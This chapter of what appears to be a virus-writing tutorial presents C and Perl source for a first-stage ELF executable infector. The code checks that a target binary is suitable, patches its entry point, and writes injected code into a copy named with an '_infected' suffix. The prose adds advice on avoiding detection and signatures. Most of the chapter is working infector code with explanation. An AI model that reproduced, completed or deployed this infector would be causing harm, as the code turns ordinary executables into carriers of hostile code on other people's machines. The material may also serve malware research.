To take a significant step forward, you must make a series of finite improvements.
Donald J. Atwood, General Motors
This chapter introduces the framework of a first stage infector written in plain C. The program will insert and activate one chunk of code into executables specified on the command line. It is not insertable itself.
The code is split into many parts that manipulate a central data structure. The idea is to replace some of these parts in later chapters to implement improvements and different infection methods. Parts are shown in random order and without any #include statements or prototypes. Identifiers prefixed with TEVWH_ are defined in the generated file config.h. See Verifying installed packages. If you need full details, a look into the sources of this document should do. Mirrors shows where to get it.
This script is used throughout the document to convert binary files into valid C code, i.e. the definition of a byte array. This could have been a small filter written in perl(1), but we actually need a lot of features.
We need to process the output of both ndisasm and objdump, on multiple platforms. Examples of valid input (i386, sparc, alpha):
08048080 6A04 push byte +0x4
10074: 82 10 20 04 mov 4, %g1
1200000b0: 02 00 bb 27 ldah gp,2(t12)
The __attribute__ clause is explained in A section called .text.
Initializing the array with string literals (looking like \xDE\xAD\xBE\xEF) is easier. However, the terminating zero that a string literal appends would not work with Doing it in C. Using a list of hexadecimal numbers instead introduces separating commas, which require special treatment of the last line.
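The difference between the two initializer styles can be made visible with sizeof. The following is a minimal sketch, not part of the original sources; the array and function names are hypothetical and exist only for illustration.

```c
#include <stddef.h>

/* A string literal initializer appends a terminating zero byte. */
static const unsigned char from_literal[] = "\xDE\xAD\xBE\xEF";

/* A brace-enclosed list holds exactly the bytes that are written down. */
static const unsigned char from_list[] = { 0xDE, 0xAD, 0xBE, 0xEF };

/* Hypothetical helpers that make the two sizes observable. */
size_t literal_size(void) { return sizeof(from_literal); }
size_t list_size(void) { return sizeof(from_list); }

/* Hypothetical helper: the extra byte at the end of the literal version. */
unsigned char literal_last_byte(void)
{
  return from_literal[sizeof(from_literal) - 1];
}
```

The literal version is one byte longer than the list version, and that extra byte is zero. Giving the array an explicit size of 4 would drop the zero in C, but the script would then have to know the code size before it prints the first line.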
If the command line option -last_line_is_ofs is passed to the program, then the last line of the disassembly specifies an offset into the code. Actually it's just the last byte of that line. You are free to use any dummy operation, see the example input above. A real-world example is at Infection #1. The last instruction itself is not emitted to the byte array. Instead the enum constant ENTRY_POINT_OFS is defined.
Source: src/platform/disasm.pl
#!/usr/bin/perl -sw
use strict;
my $LINE = " %-30s /* %-32s */\n";
$::identfier = 'main' if (!defined($::identfier));
$::size = '' if (!defined($::size));
$::align = '8' if (!defined($::align));
$::section = '.text' if (!defined($::section));
printf "const unsigned char %s[%s]\n", $::identfier, $::size;
print "__attribute__ (( aligned($::align), section(\"$::section\") )) =\n";
print "{\n";
my $code_size = 0;
my @line;
while(<>)
{
  s/^\s+//; # trim leading white space
  s/\s+$//; # trim trailing white space
  s/\s+[!;].*//; # trim trailing comments
  my $addr = (split(/[:\s]+/))[0]; # first column is the address
  s/[A-Fa-f0-9]+:?\s+//; # remove the address column
  my @code = split(/\s\s+/); # hex bytes, then the disassembly
  my $code = $code[0];
  $code =~ s/\s//g; # make objdump look like ndisasm
  $code_size += length($code) / 2;
  my $dump = '0x' . substr($code, 0, 2);
  for(my $i = 2; $i < length($code); $i += 2)
  {
    $dump .= ',0x' . substr($code, $i, 2);
  }
  push @line, [ $addr . ': ' . join(' ', @code[1..$#code]), $code, $dump ]
}
my $nr = 0;
my $max = $#line;
$max -= 1 if (defined($::last_line_is_ofs));
# every line but the last emitted one ends with a comma
while($nr < $max)
{
  printf $LINE, $line[$nr][2] . ',', $line[$nr][0];
  $nr++;
}
printf $LINE, $line[$nr][2], $line[$nr][0];
printf "}; /* %d bytes (%#x) */\n", $code_size, $code_size;
if (defined($::last_line_is_ofs))
{
  my $ofs = substr($line[$nr + 1][1], -2, 2);
  printf "enum { ENTRY_POINT_OFS = 0x%x };\n", hex($ofs);
}
Source: src/one_step_closer/target.h
#ifdef NDEBUG
#define TRACE (void)
#else
#define TRACE fprintf
#endif
#define QUOTE_EXP(n) #n
#define QUOTE_NUM(n) QUOTE_EXP(n)
#define TRACE_CHECK(l, r, op) \
  TRACE(stderr, __FILE__ ":" QUOTE_NUM(__LINE__) " " \
    QUOTE_EXP(l) op QUOTE_EXP(r) "\n")
#define CHECK_EQ(l, r) \
  if ((l) != (r)) { TRACE_CHECK((l), (r), "!="); return false; }
#define CHECK_LT(l, r) \
  if ((l) >= (r)) { TRACE_CHECK((l), (r), ">="); return false; }
/* align up to multiple of 16, will take at most 15 bytes */
#define ALIGN_UP(n) (((n) + 15) & ~15)
typedef enum { false, true } bool;
#define SELF ((TEVWH_ELF_EHDR*)TEVWH_ELF_BASE)
extern const unsigned char infection[];
typedef struct
{
  int fd_dst; /* opened write-only */
  int fd_src; /* opened read-only */
  off_t filesize;
  unsigned aligned_filesize;
  /* start of memory-mapped image, b means byte */
  union { void* v; unsigned char* b; TEVWH_ELF_EHDR* ehdr; } p;
  /* first program header (inside the memory-mapped image) */
  TEVWH_ELF_PHDR* phdr;
  /* offset to first byte after code segment (in file) */
  unsigned end_of_cs;
  unsigned aligned_end_of_cs;
  unsigned char* target_entry_code;
  /* start of host code (in memory) */
  unsigned original_entry;
} Target;
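The arithmetic behind ALIGN_UP is easy to check by hand. The sketch below repeats the macro from target.h; the helper padding_for is hypothetical and only shows how many bytes the rounding adds.

```c
/* same definition as in target.h */
#define ALIGN_UP(n) (((n) + 15) & ~15)

/* Hypothetical helper: number of padding bytes ALIGN_UP adds to n. */
unsigned padding_for(unsigned n)
{
  return ALIGN_UP(n) - n;
}
```

Adding 15 moves any value that is not already a multiple of 16 past the next boundary, and masking with ~15 clears the low four bits again. So 17 becomes 32 (15 bytes of padding), while 16 and 32 stay unchanged.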
Source: src/one_step_closer/main.inc
int main(int argc, char** argv)
{
  char** pp = argv;
  const char* p;
  int rc = argc - 1;
  while(0 != (p = *++pp))
  {
    Target t;
    fprintf(stderr, "Infecting copy of %s... ", p);
    if (!target_open(&t, p))
      continue;
    if (target_is_suitable(&t) &&
      target_patch_entry_addr(&t) &&
      target_patch_phdr(&t) &&
      target_patch_shdr(&t) &&
      target_copy_and_infect(&t)
    )
    {
      fprintf(stderr, "Ok\n");
      rc--;
    }
    target_close(&t);
  }
  fprintf(stderr, "%d infected, %d failed\n", argc - rc - 1, rc);
  return rc;
}
Modifying a file in place, as opposed to writing a copy, is possible but difficult. And between the first and the final modification the contents of the target are invalid. Imagine the worst-case scenario of a virus infecting /bin/sh being interrupted by a power failure (or the emergency shutdown of a hectic admin).
There are a few approaches to change a file while copying.
Use lseek(2), read(2) and write(2) to load pieces of the source into memory, patch them, and write them to destination. A lot of work. Can be really inefficient.
Use read(2) to get the whole source file in one go. Requires more memory. But then even the largest executable files are only a few MB in size.
Use mmap(2). In my humble opinion obviously the best way.
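What makes mmap(2) attractive here is that a MAP_PRIVATE mapping may be written to even if the file descriptor was opened read-only; the changes stay in memory and never reach the file. The following is a minimal sketch of that property, assuming a POSIX system. The function name patch_private_copy is hypothetical.

```c
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper: map `path` privately, overwrite the first byte of
 * the mapping with `value`, then read the first byte back from the file.
 * Returns the byte as stored in the file, or -1 on error.
 */
int patch_private_copy(const char* path, unsigned char value)
{
  unsigned char on_disk;
  unsigned char* image;
  off_t size;
  int result = -1;
  int fd = open(path, O_RDONLY);

  if (fd < 0)
    return -1;
  size = lseek(fd, 0, SEEK_END);
  if (size > 0)
  {
    image = mmap(0, (size_t)size, PROT_READ | PROT_WRITE,
      MAP_PRIVATE, fd, 0);
    if (image != MAP_FAILED)
    {
      image[0] = value; /* changes only the private copy in memory */
      if (lseek(fd, 0, SEEK_SET) == 0 && read(fd, &on_disk, 1) == 1)
        result = on_disk; /* the file itself is untouched */
      munmap(image, (size_t)size);
    }
  }
  close(fd);
  return result;
}
```

For a file that starts with the letter A, a call like patch_private_copy(path, 'Z') still returns 'A'. The patched image has to be written out explicitly, which is exactly what a copy to a second file descriptor does.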
Source: src/one_step_closer/open.inc
bool target_open(Target* t, const char* src_filename)
{
  static const char suffix[] = "_infected";
  const char* base;
  size_t len;
  char* dst_filename;
  TRACE(stderr, "target_open(%s)\n", src_filename);
  base = strrchr(src_filename, '/');
  base = (base == 0) ? src_filename : base + 1;
  len = strlen(base);
  /* sizeof(suffix) includes the terminating zero */
  dst_filename = malloc(len + sizeof(suffix));
  if (dst_filename == 0)
  {
    TRACE(stderr, "Out of memory allocating %lu bytes.\n",
      (unsigned long)(len + sizeof(suffix)));
    return false;
  }
  memcpy(dst_filename, base, len);
  memcpy(dst_filename + len, suffix, sizeof(suffix));
  t->fd_src = open(src_filename, O_RDONLY);
  if (t->fd_src >= 0)
  {
    t->filesize = lseek(t->fd_src, 0, SEEK_END);
    if ((off_t)-1 != t->filesize)
    {
      t->aligned_filesize = ALIGN_UP(t->filesize);
      t->p.v = mmap(0, t->filesize, PROT_READ | PROT_WRITE,
        MAP_PRIVATE, t->fd_src, 0);
      if (MAP_FAILED != t->p.v)
      {
        t->fd_dst = open(dst_filename, O_WRONLY | O_CREAT | O_TRUNC, 0775);
        if (t->fd_dst >= 0)
        {
          free(dst_filename);
          return true;
        }
        perror("open");
      }
      else
        perror("mmap");
    }
    else
      perror("lseek");
  }
  else
    perror("open");
  free(dst_filename);
  return false;
}
Source: src/one_step_closer/close.inc
void target_close(Target* t)
{
  TRACE(stderr, "target_close\n");
  if (t->p.v != 0)
    munmap(t->p.v, t->filesize);
  close(t->fd_src);
  close(t->fd_dst);
}
A visible virus is a dead virus. Breaking things is quite the opposite of invisibility. So before you even think about polymorphism and stealth mechanisms you should make sure your code does nothing unexpected. On the other hand, exhaustive checks of target files will severely increase code size. And verifying signatures and other constant values is likely to make the virus code itself a constant signature. A better approach is to compare the target with the host executable currently running the virus.
Finding a meaningful set of tests is an art in itself. For example, some executables of Red Hat 8.0 have an additional program header of type GNU_EH_FRAME. This means that e_phnum can differ between infector and target.
Source: src/one_step_closer/suitable.inc
bool target_is_suitable(Target* t)
{
  enum { CMP_SIZE = offsetof(TEVWH_ELF_EHDR, e_entry) };
  TEVWH_ELF_PHDR* self_phdr;
  TEVWH_ELF_PHDR* phdr;
  TEVWH_ELF_EHDR* ehdr;
  TRACE(stderr, "target_is_suitable: SELF=%p\n", SELF);
  self_phdr = (TEVWH_ELF_PHDR*)((char*)SELF + SELF->e_phoff);
  phdr = t->phdr = (TEVWH_ELF_PHDR*)(t->p.b + t->p.ehdr->e_phoff);
  ehdr = t->p.ehdr;
  CHECK_EQ(memcmp(&ehdr->e_ident, &SELF->e_ident, CMP_SIZE), 0);
  CHECK_EQ(ehdr->e_phoff, SELF->e_phoff);
  CHECK_EQ(ehdr->e_ehsize, SELF->e_ehsize);
  CHECK_EQ(ehdr->e_phentsize, SELF->e_phentsize);
  CHECK_EQ(ehdr->e_shentsize, SELF->e_shentsize);
  /* the type of these headers must be PT_LOAD */
  CHECK_EQ(phdr[2].p_type, self_phdr[2].p_type);
  CHECK_EQ(phdr[3].p_type, self_phdr[3].p_type);
  /* a code segment with trailing 0-bytes makes no sense, anyway */
  CHECK_EQ(phdr[2].p_filesz, phdr[2].p_memsz);
  t->end_of_cs = phdr[2].p_offset + phdr[2].p_filesz;
  t->aligned_end_of_cs = ALIGN_UP(t->end_of_cs);
  t->target_entry_code = t->p.b + (t->p.ehdr->e_entry - TEVWH_ELF_BASE);
  return true;
}
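The first check in target_is_suitable compares every header byte in front of e_entry with a single memcmp, using offsetof to find where that field starts. The sketch below shows the same idiom on a hypothetical stand-in structure. DemoHeader and same_prefix are assumptions made for illustration, not the real ELF header type from config.h.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for the leading fields of an ELF header. */
typedef struct
{
  unsigned char ident[16];
  unsigned short type;
  unsigned short machine;
  unsigned int version;
  unsigned int entry; /* first field that is allowed to differ */
} DemoHeader;

/* Compare all bytes in front of `entry` in one go. */
int same_prefix(const DemoHeader* a, const DemoHeader* b)
{
  return memcmp(a, b, offsetof(DemoHeader, entry)) == 0;
}
```

Two headers that differ only in entry compare equal; a different machine value makes the comparison fail. The idiom relies on there being no padding bytes in front of the compared boundary, which holds for this layout on common platforms.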
This function is independent of the chosen infection method. The directory name e1 means that this is the first (orthogonal) implementation. Anyway, without this function the behavior of the target is not modified. If the infection method prevents double infection by design, this can be used for vaccination in the true meaning of the word: Infection with a deactivated mutation makes the target immune to less friendly attackers.
Source: src/one_step_closer/e1/patch_entry_addr.inc
bool target_patch_entry_addr(Target* t)
{
  TRACE(stderr, "target_patch_entry_addr\n");
  t->original_entry = t->p.ehdr->e_entry;
  t->p.ehdr->e_entry = target_new_entry_addr(t);
  TRACE(stderr, "e_entry=%08x\n", t->p.ehdr->e_entry);
  return true; /* this implementation can't fail */
}
infection is an array of bytes generated by Dressing up binary code. Constant ENTRY_POINT_OFS points to the location inside this array to patch with the original entry address.
Source: src/one_step_closer/write_infection.inc
unsigned target_write_infection(Target* t)
{
  enum { ADDR_SIZE = sizeof(((Target*)0)->original_entry) };
  enum { REST_OFS = ENTRY_POINT_OFS + ADDR_SIZE };
  TRACE(stderr, "target_write_infection ENTRY_POINT_OFS=%d\n",
    ENTRY_POINT_OFS);
  /* i386: first byte is the opcode for "push" */
  write(t->fd_dst, infection, ENTRY_POINT_OFS);
  /* i386: next four bytes is the address to "ret" to */
  write(t->fd_dst, &t->original_entry, sizeof(t->original_entry));
  /* rest of infective code */
  write(t->fd_dst, infection + REST_OFS, sizeof(infection) - REST_OFS);
  return sizeof(infection);
}